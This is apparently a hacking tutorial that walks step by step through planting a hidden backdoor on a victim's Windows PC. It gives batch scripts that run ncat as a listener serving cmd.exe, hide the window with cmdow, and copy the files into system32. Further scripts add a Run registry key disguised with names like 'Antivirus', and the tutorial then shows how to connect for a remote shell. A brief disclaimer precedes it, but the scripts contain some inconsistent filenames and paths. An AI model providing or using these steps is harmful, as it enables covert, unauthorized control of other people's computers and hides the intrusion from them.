Make a back-door and hack remote computer
I am not responsible for any Non-Ethical use of this Tutorial.
In this tutorial I am going to teach you how to hack a remote COMPUTERwith a backdoor.
I am doing this on Windows XP.I will also work in Linux but there some change is needed.
Tools required:
1> NCat.exe: This tool is a special tool from the Nmap team. (Popular for their famous port scanner Nmap).It’s a very useful tool it has many functions but in this case I am only using the port listening capabilities of this tools. Mind it that it is not “Net Cat”. Its “Ncat” It is more smarter than the “netcat”.
2>Cmd.exe Command prompt which is with your WINDOWS machine.
3> Cmdow.exe I will discuss later.
Let’s begin.
1>Download the SOFTWARE package I have uploaded in my website.
2> Unpack it with winrar.
3> create a new folder anywhere you want in your PC.
4> place the two files “ncat.exe” and “cmdow.exe” in that folder.(I have added all required files in the SOFTWARE package)
5> open Notepad (Go to start->run->type notepad->press enter).
6> in notepad type following
*************************************************//don’t include these * lines.
@echo off
ncat -l 1234 -e cmd.exe
Save this file as “listner.bat” or anything you want without quotes in the same folder where you have places ncat and cmdow executables.
What is happening here??
This command will open port “1234” in the Victims computer. You may use any other no. but my suggestion is to take little long no.
7>Open notepad again and type following.
******************************************************//don’t includes these lines.
cmdow /RUN/HID listener.bat
Save this file as “hide.bat” in the same location.
What is happening here??
If you only open the listener.bat file .The port will be opened. But you will see that a command window is staying in the screen. This is not expected. But if you open the “listener.bat” file it will also open the port but there will be no command window in screen.
Your backdoor is now completely hidden and will start working from background.
So now what you have to do??
Place ncat.exe, cmdow.exe, listner.bat these three files in C:\windows\system32 of the victim’s computer.
And place hide.bat in the startup folder (C:\Documents and Settings\All Users\Start Menu\PROGRAMS\Startup) of victims PC. By this ncat will start working every time the victim start his/her PC.
Some time it is difficult to place all these files in the at perfect place within short span of time.
So I will suggest you to make a batch “plant.bat” file like following at the same folder which you have created at first in your PC. So when you carry all these files to the victim’s PC double click on this file. It will copy all the files at the perfect place.
@echo off
Copy ncat.exe c:\windows\system32
Copy cmdow.exe c:\windows\system32
Copy start.bat c:\window\system32
copy hide.bat c:\windows\system32
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v anything /t REG_SZ /d hide.bat
Save this file as plant.bat.
Make sure that the root drive is C. if not then change the drive name c: .
The last line will set the registry key to open the hide.bat files in every startup on victims pc.
You may Change the last line little bit by changing “anything”. It doesn’t matter. It’s better to change it with the names like Antivirus, Scandisc, Scanner Etc
Now all done…………….
Now you have got………
Make sure all these six are in same folder.
Carry these files to victims PC. And just double click on plant.bat. It will do its desired job.
Now you have cracked the server.
Now come to your PC. Follow these steps
1> Place the ncat.exe to your c:\window\system32 folder.
2> Open command prompt (start->run->type cmd->press enter) .
3> Type ncat pppp -Ip address of the victims PC.(you can try it with your PC.Just use ip
pppp port no. that you have written in listnet.bat file.(in this tutorial I have used 1234).
You will get the command prompt of the remote computer. You will get the OS version of the REMOTE PC.You can run any command you want on this prompt. It will be executed on the remote PC.
Now type “explorer” without quotes and press enter. The “My Documents” of the remote computer should open if you have done all right.
You can test it in your P.C.(Local host or if you are connected with internet open command prompt type “ipconfig” without quotes and press enter, it will show your ip, you can test it with that ip address) Mind it this application cannot plant permanent back door. So it will be more harmful if it can set on startup. That means this software will start working on every startup and keep open that port in victim’s PC. If it run once just restarts your P.C. the application will stop working. (You can use any kind of port scanner to check this) Your P.C. will be safe. So I have told you how would you able to make it start on every boot.
It can be detected by ANTIVIRUS I will also let u know how to bypass it.
Thank you for reading this article!!!!!!!!!!!
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